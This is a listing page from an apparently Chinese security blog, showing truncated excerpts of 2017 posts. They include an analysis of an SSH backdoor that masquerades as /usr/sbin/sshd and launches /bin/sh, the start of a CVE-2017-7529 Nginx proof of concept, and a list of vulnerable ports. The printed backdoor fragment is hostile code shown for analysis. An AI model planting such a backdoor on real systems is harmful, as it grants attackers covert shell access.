11 【转载】一款短小精致的SSH后门分析

fresh     2017.08.11     记录     抢沙发     639人打酱油
1、原理解释 这个ssh后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd,将系统原先的sshd移到/usr/bin下  sshd后门源码: #!/usr/bin/perl exec"/bin/sh"if(getpeername(STDIN)=...

19 Nginx源header信息泄露漏洞poc

fresh     2017.07.19     python     抢沙发     838人打酱油
CVE-2017-7529整数溢出漏洞,可利用获取源站返回头信息。 #coding=utf-8 importurllib2 importre importurlparse importHTMLParser importssl importsys try: _create_unveri...

27 wooyun搜索

fresh     2017.06.27     记录     抢沙发     660人打酱油
有时需要搜索wooyun漏洞,学习下大牛们的技巧! 之前放出来一个8.8w版本,怕网上其他地方失效,就自建了一个用! 内容涵盖:  88820个公开漏洞,9245位白帽子,1269篇wooyun知识库文章 地址:http://www.fr1sh.c...

15 常见端口对应漏洞

fresh     2017.06.15     记录     抢沙发     615人打酱油
161        SNMP未授权访问 2181    Zookeeper未授权访问 1521    oracle_tns 1121...

03 c#正则表达式筛选结果

fresh     2017.06.03     小工具     抢沙发     702人打酱油
最近时常遇到,需要用正则表达式来处理得到的一些数据 最开始使用python,读取文件、匹配正则、写入文件感觉不是很方便,每次修改正则都需要修改代码,感觉不是很好 后来使用网页版的: http://tool.chinaz.com/regex/  http:/...

25 【转】kali安装巡风

fresh     2017.05.25     python     抢沙发     1021人打酱油
地址: kali安装巡风 https://www.yagami.info/ubuntu-debian-kali-bu-shu-xun-feng/ 简要步骤: #系统配置 设置时区:cp-f/usr/share/zoneinfo/Asia/Shanghai...

16 blog更新

fresh     2017.05.16     随语     抢沙发     574人打酱油
之前用的虚拟空间,最近到期了,更换到了腾讯云的vps 重新搭建了,不在使用厚重的wordpress,采用了轻便的emlog,现在感觉还不错 ...
关闭